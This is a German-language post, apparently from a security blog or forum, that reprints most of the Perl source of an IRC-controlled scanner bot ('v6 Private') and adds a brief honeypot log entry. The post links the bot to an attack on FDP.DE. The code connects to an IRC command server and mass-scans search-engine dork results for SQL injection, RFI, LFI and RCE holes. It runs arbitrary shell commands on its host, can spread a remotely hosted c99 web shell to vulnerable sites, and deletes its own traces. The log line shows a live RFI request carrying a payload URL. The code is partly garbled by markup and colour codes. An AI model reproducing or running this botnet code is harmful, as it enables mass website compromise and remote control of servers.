id.txt lädt log.txt nach:
CODE:
#!/usr/bin/perl
#####################################################################################
## ##
## 15/06/2008 ##
## Author : Osirys ##
## WebSite : ##
## Contact : osirys[at]live[dot]it ##
## Italian Coder ##
## ##
## ## IMPORTANT ## ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ##
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ##
## ## ##
## ##
## Release: v6 Private ##
## After the success of the v5, I decided to code a new release :-) ##
## This is a private script. If you have it, keep it priv8 !!! ##
## ##
## Features: ##
## [+]Sql Injection Scanner (Fixed a bug which release v5 was affected) ##
## [+]Remote File Inclusion Scanner ##
## [+]Local File Inclusion Scanner ##
## [+]Remote Code Execution Scanner ##
## [+]Mass Scan, Google,AlltheWeb,Yahoo, Msn domains: ##
## .at/.com.au/.com.br/.ca/.ch/.cn/.de/.dk/.es/.fr/.it/.co.jp/.com.mx/.co.uk ##
## [+]Integrated Shell, so you can execute commands on the server ##
## [+]Security Mode to protect "dangerous" functions ##
## [+]Spread Mode, to activate or disable Spread Function ##
## [+]Single Spread Mode, to spread on RFI vulnerable sites ##
## [+]Bypass Engines ON: Google, Yahoo ##
## !: To "bypass" these engines, the Scanner just looks for websites on other ##
## engines that use the same bots than the main ones ##
## ##
#####################################################################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
#######################################################
## CONFIGURATION //
#######################################################
$auth = "Osirys";
$authmail = "osirys\@live.it";
my $id = "http://afe.la/id.txt?"; #Your RFI Response
my $shell = "http://web4cc.t35.com/c99.txt?"; #Shell printed on the Vulnerable Site
my $ircd = "afro.hitmanslife.net"; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#achap"; #Chan for Scan
my $chan2 = "#achap"; #Results will be printed here too
my $nick = "ashraf|".int(rand(99))."[xx]"; #Nick
my @admins = ("b");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "http://afe.la/b?";
my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
&cheek();
my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "achap123"; #Password to execute commands on the server
my $secpwd = "achap123"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "achap123"; #Passowrd to enable/disable the Spread Mode
my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd != $cmdpwd;
my $badsecpwd != $secpwd;
#######################################################
## END OF CONFIGURATION //
#######################################################
$k= 0;
print q{
------------------------------------------------
__ ___
__ __/ / / __| __ __ _ _ _ _ _ ___ _ _
\ V / _ \ \__ \/ _/ _` | ' \| ' \/ -_) '_|
\_/\___/ |___/\__\__,_|_||_|_||_\___|_|
------------------------------------------------
[+] Coded by Osirys
[+] Contact: osirys[at]live[it]
[+] Keep it private !
[+] *New release, more fun ;)
[+] *Updated to: 18/06/2008
};
open($f1le, ">", "rm.txt");
print $f1le "\#!/usr/bin/perl\n";
print $f1le "exec("rm -rf \*siti\* && rm rm.txt")\;\n";
close $f1le;
@help = (
"��15,1[!]� �9,1!response ��15,1 > ��11,1Test if the RFI Response is working��",
"��15,1
<li class="bb-listitem">� �9,1!chid <new rfi-id> ��15,1 > ��11,1Change the RFI-Response��",
"��15,1</li>
<li class="bb-listitem">� �9,1!killme ��15,1 > ��11,1KILL The Bot��",
"��15,1[!]� �9,1!milw0rm rss ��15,1 > ��11,1Get the last Milw0rm bugs��",
"��15,1[!]� �9,1!new rfi bugs ��15,1 > ��11,1Get the last 10 RFI bugs��",
"��15,1[!]� �9,1!new lfi bugs ��15,1 > ��11,1Get the last 10 LFI bugs��",
"��15,1[!]� �9,1!new sql bugs ��15,1 > ��11,1Get the last 10 SQL Injection bugs��",
"��15,1[!]� �9,1!new rce bugs ��15,1 > ��11,1Get the last 10 RCE bugs��",
"��15,1[!]� �9,1!rfi <bug> <dork> -p <sites/proc> ��15,1 > ��11,1Start the RFI Scanner��",
"��15,1[!]� �9,1!lfi <bug> <dork> ��15,1 > ��11,1Start the LFI Scanner��",
"��15,1[!]� �9,1!sql <bug> <dork> -p <sites/proc> ��15,1 > ��11,1Start the SQL Injection Scanner��",
"��15,1[!]� �9,1!rce <bug> <dork> -p <sites/proc> ��15,1 > ��11,1Start the RCE Scanner��",
"��15,1[!]� �9,1!mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc> ��15,1 > ��11,1Start the Mass Scan��",
"��15,1</li>
<li class="bb-listitem">� �9,1!cmd <bashline> ��15,1 > ��11,1Gives command on the Bot's shell. Ex: (!cmd id) (!cmd uname -a)��",
"��15,1</li>
<li class="bb-listitem">� �9,1!sspread -s <RFI_Vuln_site> ��15,1 > ��11,1To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)��",
"��15,1</li>
<li class="bb-listitem">� �9,1!admin add/remove <nickname> ��15,1 > ��11,1To add/remove a nickname to/from the admin list��",
"��15,1</li>
<li class="bb-listitem">� �9,1/msg $nick !Sec ON/OFF -p <pwd> ��15,1 > ��11,1To enable or disable Security Mode��",
"��15,1</li>
<li class="bb-listitem">� �9,1/msg $nick !Spread ON/OFF -p <pwd> ��15,1 > ��11,1To enable or disable Spread Mode��",
"��15,1[!]� �9,1!info ��15,1 > ��11,1Get infos about the Bot��",
"��4,1[!!] For commands with the��15,1 </li>
<li class="bb-listitem">��4,1 you must be an Admin of the v6��"
);
my $sys = `uname -a`;
my $up = `uptime`;
if ($spreadACT == 0) {
$t5 = "OFF";
}
elsif ($spreadACT == 1) {
$t5 = "ON";
}
if ($securityACT == 0) {
$y5 = "OFF";
}
elsif ($securityACT == 1) {
$y5 = "ON";
}
if (fork() == 0) {
&irc($ircd, $port, $chan1, $chan2, $nick);
}
else {
exit(0);
}
sub irc() {
my ($ircd, $port, $chan1, $chan2, $nick) = @_;
$c0n = IO::Socket::INET->new(PeerAddr => "$ircd",PeerPort => "$port",Proto => "tcp") || die "Can not connect on server!\n";
$c0n->autoflush(1);
print $c0n "NICK $nick\n";
print $c0n "USER soldier 8 * : Osirys\n";
print $c0n "JOIN $chan1\n";
writ1("��4,1_/��9,1 V6-Private ��11,1ON ��7,1_>");
writ1("��4,1¸ Coded by Osirys��");
while ($line = <$c0n>) {
$k++;
my @word = split /\:/, $line;
my @words = split /\!/, $word[1];
my $sys = `uname -a`;
my $up = `uptime`;
@info = (
"��9,1[i]� �15,1Release :� �11,1v6 -Private IrcBot��",
"��9,1[i]� �15,1Author :� �11,1$auth - Italian coder��",
"��9,1[i]� �15,1Contact :� �11,1$authmail��",
"��9,1[i]� �15,1Uname -a:� �11,1$sys��",
"��9,1[i]� �15,1Uptime :� �11,1$up��",
"��9,1[i]� �15,1Spread Mode:� �11,1$t5��",
"��9,1[i]� �15,1Security Mode:� �11,1$y5��"
);
if ($spreadACT == 0) {
$t5 = "OFF";
}
elsif ($spreadACT == 1) {
$t5 = "ON";
}
if ($securityACT == 0) {
$y5 = "OFF";
}
elsif ($securityACT == 1) {
$y5 = "ON";
}
if ($line =~ /^PING \:(.*)/) {
print $c0n "PONG :$1";
}
if ($line =~ /001/) {
print $c0n "JOIN $chan1\n";
}
if ($line =~ /PRIVMSG $chan1 :!help/) {
&help();
}
if ($line =~ /PRIVMSG $chan1 :!info/){
&info();
}
if ($line =~ /PRIVMSG $chan1 :!response/) {
&response();
}
if ($line =~ /PRIVMSG $chan1 :!milw0rm rss/) {
&milw0rm();
}
if ($line =~ /PRIVMSG $chan1 :!new ([a-z]{3}) bug/) {
&bug_update($1);
}
if (($line =~ /PRIVMSG $chan1 :!chid\s+(.*)/)&&($securityACT == 0)) {
&chid($words[0],$1);
}
if (($line =~ /PRIVMSG $nick :!chid\s+(.*) -p $chidpwd/)&&($securityACT == 1)) {
&chid($words[0],$1,"a");
}
elsif (($line =~ /PRIVMSG $nick :!chid\s+(.*) -p $badidpwd/)&&($securityACT == 1)) {
pm($words[0],"��15,1[-]� �9,1Error Changing the RFI-Response (bad Password)!��");
}
if (($line =~ /PRIVMSG $chan1 :!killme/)&&($securityACT == 0)) {
&killme($words[0]);
}
if (($line =~ /PRIVMSG $nick :!killme -p $killpwd/)&&($securityACT == 1)) {
&killme($words[0],"a");
}
elsif (($line =~ /PRIVMSG $nick :!killme -p $badkillpwd/)&&($securityACT == 1)) {
pm($words[0],"��15,1[-]� �12,4Error Killing the Bot (Null or bad Password) !��");
}
if (($line =~ /PRIVMSG $chan1 :!admin (add|remove)\s+(.*)/)&&($securityACT == 0)) {
&ch_admin($1,$words[0],$2);
}
if (($line =~ /PRIVMSG $nick :!admin (add|remove)\s+(.*) -p $chadminpwd/)&&($securityACT == 1)) {
&ch_admin($1,$words[0],$2,"a");
}
elsif (($line =~ /PRIVMSG $nick :!admin (add|remove)\s+(.*) -p $badchadminpwd/)&&($securityACT == 1)) {
pm($words[0],"��15,1[-]� �12,4Error changing the Admin list (Null or bad Password) !��");
}
if (($line =~ /PRIVMSG $chan1 :!cmd\s+(.*)/)&&($securityACT == 0)) {
&cmd($words[0],$1);
}
if (($line =~ /PRIVMSG $nick :!cmd\s+(.*) -p $cmdpwd/)&&($securityACT == 1)) {
&cmd($words[0],$1,"a");
}
elsif (($line =~ /PRIVMSG $nick :!cmd\s+(.*) -p $badcmdpwd/)&&($securityACT == 1)) {
pm($words[0],"��15,1[-]� �12,4Error using the shell (Null or bad Password) !��");
}
if ($line =~ /PRIVMSG $nick :!Sec\s+(.*) -p $secpwd/) {
&sec($words[0],$1);
}
elsif ($line =~ /PRIVMSG $nick :!Sec\s+(.*) -p $badsecpwd/) {
pm($words[0],"��15,1[-]� �12,4Error changing the Security Mode (Null or bad Password) !��");
}
if (($line =~ /PRIVMSG $chan1 :!Spread\s+(.*)/)&&($securityACT == 0)) {
&spread($words[0],$1);
}
if (($line =~ /PRIVMSG $nick :!Spread\s+(.*) -p $spreadpwd/)&&($securityACT == 1)) {
&spread($words[0],$1,"a");
}
elsif (($line =~ /PRIVMSG $nick :!Spread\s+(.*) -p $badspreadpwd/)&&($securityACT == 1)) {
pm($words[0],"��15,1[-]� �12,4Error changing the Spread Mode (Null or bad Password) !��");
}
if ($line =~ /PRIVMSG $chan1 :!sspread -s\s+(.*)/) {
&sspread($words[0],$1);
}
if (($line =~ /PRIVMSG $chan1 :!rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
&rfi_cheek($1,$2,$3,"s",$words[0]);
}
if (($line =~ /PRIVMSG $chan1 :!rfi\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
&rfi_cheek($1,$2,$3,"j");
}
if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/)&&($securityACT == 1)&&(fork() == 0)) {
&lfi_cheek($1,$2,$3,"s",$words[0]);
}
if (($line =~ /PRIVMSG $chan1 :!lfi\s+(.*?)\s+(.*)/)&&($securityACT == 0)&&(fork() == 0)) {
&lfi_cheek($1,$2,"j");
}
if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
&sql_cheek($1,$2,$3,"s",$words[0]);
}
if (($line =~ /PRIVMSG $chan1 :!sql\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
&sql_cheek($1,$2,$3,"j");
}
if (($line =~ /PRIVMSG $chan1 :!rce\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
&rce_cheek($1,$2,$3,"s",$words[0]);
}
if (($line =~ /PRIVMSG $chan1 :!rce\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
&rce_cheek($1,$2,$3,"j");
}
if (($line =~ /PRIVMSG $chan1 :!mass\[(rfi|lfi|sql|rce)\]\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 1)&&(fork() == 0)) {
&mass_cheek($1,$2,$3,$4,"s",$words[0]);
}
if (($line =~ /PRIVMSG $chan1 :!mass\[(rfi|lfi|sql|rce)\]\s+(.*?)\s+(.*)\s+-p(.+[0-9])/)&&($securityACT == 0)&&(fork() == 0)) {
&mass_cheek($1,$2,$3,$4,"j");
}
}
}
sub help() {
if ($securityACT == 0) {
@help;
foreach my $e(@help){
writ1("$e");
}
}
elsif ($securityACT == 1) {
@help;
$help[1] = "��15,1</li>
<li class="bb-listitem">� �9,1/msg $nick !chid <new rfi-id> -p <pwd> ��15,1 > ��11,1Change the RFI-Response��";
$help[2] = "��15,1</li>
<li class="bb-listitem">� �9,1/msg $nick !killme ��15,1 > -p <pwd> ��11,1KILL The Bot��";
$help[8] = "��15,1</li>
<li class="bb-listitem">� �9,1!rfi <bug> <dork> -p <sites/proc> ��15,1 > ��11,1Start the RFI Scanner��";
$help[9] = "��15,1</li>
<li class="bb-listitem">� �9,1!lfi <bug> <dork> ��15,1 > ��11,1Start the LFI Scanner��";
$help[10] = "��15,1</li>
<li class="bb-listitem">� �9,1!sql <bug> <dork> -p <sites/proc> ��15,1 > ��11,1Start the SQL Injection Scanner��";
$help[11] = "��15,1</li>
<li class="bb-listitem">� �9,1!rce <bug> <dork> -p <sites/proc> ��15,1 > ��11,1Start the RCE Scanner��";
$help[12] = "��15,1</li>
<li class="bb-listitem">� �9,1!mass[rfi/lfi/sql/rce] <bug> <dork> -p <sites/proc> ��15,1 > ��11,1Start the Mass Scan��";
$help[13] = "��15,1</li>
<li class="bb-listitem">� �9,1/msg $nick !cmd <bashline> -p <pwd> ��15,1 > ��11,1Gives command on the Bot's shell. Ex: (!cmd id) (!cmd uname -a)��";
$help[14] = "��15,1</li>
<li class="bb-listitem">� �9,1/msg $nick !spread -s <RFI_Vuln_site> -p <pwd> ��15,1 > ��11,1To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)��";
$help[15] = "��15,1</li>
<li class="bb-listitem">� �9,1/msg $nick !admin add/remove <nickname> -p <pwd> ��15,1 > ��11,1To add/remove a nickname to/from the admin list��";
$help[16] = "��15,1</li>
<li class="bb-listitem">� �9,1/msg $nick !Sec ON/OFF -p <pwd> ��15,1 > ��11,1To enable or disable Security Mode��";
$help[17] = "��15,1</li>[*]� �9,1/msg $nick !Spread ON/OFF -p <pwd> ��15,1 > ��11,1To enable or disable Spread Mode��";
$#help = 18;
writ1("��4,1[!] Security Mode is ON. To use *commands you have to be an admin of the v6��");
foreach my $e(@help){
writ1("$e");
}
}
}
sub info() {
@info;
foreach my $n(@info) {
writ1("$n");
}
}
sub response() {
my $re = query($id);
if ($re =~ /Osirys/) {
writ1("��15,1[+]� �12,9RFI Response is working !��");
}
else {
writ1("��15,1[-]� �12,4RFI Response is NOT working !��");
}
}
sub milw0rm() {
my $mlink = ("http://www.milw0rm.com/rss.php");
my $re = query($mlink);
my $l = -1;
while ($re =~ m/<title>(.+?)<\/title>/g){
my $title = $1; $title =~ s/\<\;/</g;
if ($title !~ /milw0rm/) {
push(@ttot,$title);
}
}
while ($re =~ m/<link>(.+?)<\/link>/g) {
my $link = $1;
if ($link !~ /http:\/\/milw0rm.com\//) {
push(@ltot,$link);
}
}
writ1("��15,1[+]� �4,1Last Milw0rm bugs:��");
foreach my $n(@ttot){
$l++;
writ1("��15,1[+]� �9,1$n��4,1 -��11,1 $ltot[$l]��");
}
}
sub bug_update() {
my $kind = $_[0];
if ($kind =~ /rfi/) {
my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs
writ1("��15,1[+]� �9,1Last 10 RFI bugs:��");
foreach my $n(@re) {
writ1("� �9,1$n ��");
}
}
elsif ($kind =~ /lfi/) {
my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs
writ1("��15,1[+]� �9,1Last 10 LFI bugs:��");
foreach my $n(@re) {
writ1("� �9,1$n ��");
}
}
elsif ($kind =~ /sql/) {
my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs
writ1("��15,1[+]� �9,1Last 10 SQL-INJ bugs:��");
foreach my $n(@re) {
writ1("� �9,1$n ��");
}
}
elsif ($kind =~ /rce/) {
my @re = query("nostrosito"); #Put here a link in .txt with a list of bugs
writ1("��15,1[+]� �9,1Last 10 RCE bugs:��");
foreach my $n (@re) {
writ1("� �9,1$n ��");
}
}
}
sub chid() {
my $nick = $_[0];
my $newid = $_[1];
my $reply = $_[2];
my $val = admin($nick);
if ($val == 1) {
$id = $newid;
if ($reply =~ /a/) {
pm($nick, "��15,1[+]� �9,1New RFI Response: $id��");
}
writ1("��15,1[+]� �9,1RFI Response changed !��");
writ1("��15,1[+]� �9,1New RFI Response: $id��");
}
else {
pm($nick,"��4,1[!] You are not authorized to execute this command!��");
}
}
sub killme() {
my $nick = $_[0];
my $reply = $_[1];
my $val = admin($nick);
if ($reply =~ /a/) {
if ($val == 1) {
pm($nick, "��15,1[!]� �12,4Bye Bye !��");
writ1("��15,1[!]� �12,4Bye Bye !��");
print $c0n "QUIT";
exec("perl rm.txt && pkill perl \n");
}
}
else {
if ($val == 1) {
writ1("��15,1[!]� �12,4Bye Bye !��");
print $c0n "QUIT";
exec("perl rm.txt && pkill perl \n");
}
else {
writ1("��4,1[!] You are not authorized to execute this command!��");
}
}
}
sub ch_admin() {
@admins;
my $command = $_[0];
my $nick = $_[1];
my $nick2 = $_[2];
my $mode = $_[3];
my $val = admin($nick);
if ($val == 1) {
if ($command =~ /add/) {
if ($mode =~ /a/) {
pm($nick,"��15,1[+]� �12,9$nick2 added in the Admin List!!��");
}
push(@admins, $nick2);
writ1("��15,1[+]� �12,9$nick added $nick2 in the Admin List!!��");
}
elsif ($command =~ /remove/) {
$t_adm = scalar(@admins);
foreach my $a(@admins){
if ($a eq $nick2) {
$l = $t_adm +1;
$a = $a[$l];
$#admins = $t_adm;
}
}
if ($mode =~ /a/) {
pm($nick,"��15,1[+]� �12,9$nick2 removed from the Admin List!!��");
}
writ1("��15,1[+]� �12,9$nick removed $nick2 from the Admin List!!��");
}
}
else {
pm($nick,"��4,1[!] You are not authorized to execute this command!��");
}
}
gekürzt
Ein wunderschöner perl bot!
Momentan bin ich nicht sicher ob dies der bot war, der auf FDP.DE eingeschlagen ist,
zumal mindestens zwei verschiedene dort agierten.
Nachtrag:
Mein eigener Honigtopf hat den"FDP-RFI" auch aufgeschnappt:
--MARK--,"Wed Aug 20 01:59:43 CEST 2008","apache/HTTP","69.61.106.55","172.16.1.10",57608,80,
"GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1
Ein bischen Spass muss sein:
http://blog.fdp.de/archives/143-Berliner-Politfestspiele-auf-allen-Buehnen.html
